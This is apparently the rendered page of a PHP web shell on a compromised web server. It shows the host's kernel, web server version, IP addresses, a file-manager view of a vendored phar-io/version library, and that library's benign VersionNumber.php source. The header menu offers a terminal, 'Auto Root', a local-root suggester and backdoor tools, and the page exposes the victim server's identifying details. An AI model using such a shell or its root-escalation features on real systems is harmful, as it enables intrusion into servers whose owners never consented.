Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.140.242.43
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
vendor /
phar-io /
version /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
constraints
[ DIR ]
drwxr-xr-x
2018-07-08 09:00
exceptions
[ DIR ]
drwxr-xr-x
2018-07-08 09:00
PreReleaseSuffix.php
1.85
KB
-rw-r--r--
2018-07-08 09:00
Version.php
4.09
KB
-rw-r--r--
2018-07-08 09:00
VersionConstraintParser.php
3.41
KB
-rw-r--r--
2018-07-08 09:00
VersionConstraintValue.php
2.51
KB
-rw-r--r--
2018-07-08 09:00
VersionNumber.php
802
B
-rw-r--r--
2018-07-08 09:00
Save
Rename
<?php /* * This file is part of PharIo\Version. * * (c) Arne Blankerts <arne@blankerts.de>, Sebastian Heuer <sebastian@phpeople.de>, Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace PharIo\Version; class VersionNumber { /** * @var int */ private $value; /** * @param mixed $value */ public function __construct($value) { if (is_numeric($value)) { $this->value = $value; } } /** * @return bool */ public function isAny() { return $this->value === null; } /** * @return int */ public function getValue() { return $this->value; } }